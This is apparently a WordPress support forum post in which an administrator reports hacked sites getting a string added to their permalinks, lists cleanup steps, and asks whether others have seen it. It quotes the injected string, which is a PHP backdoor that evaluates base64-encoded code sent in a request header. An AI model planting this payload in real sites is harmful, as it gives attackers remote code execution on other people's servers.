orangjulSeveral months ago we had a problem with sites being hacked and this code (or similar) being added to the end of permalinks:
/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
We upgraded all our sites to the latest version, upped permissions on our servers, removed suspicious subscribers, etc. We also made it a best practice to not use the default username of "admin" and made something unique. I believe at the time this was happening on WP 2.7 or 2.8.
Today I discovered it on a site currently on 3.0. I'm reading this thread currently but don't know how relevant it is at this point: http://wordpress.org/support/topic/wp-adding-code-to-the-end-of-url-links-breaking-them?replies=67
Has anyone else run into this recently???
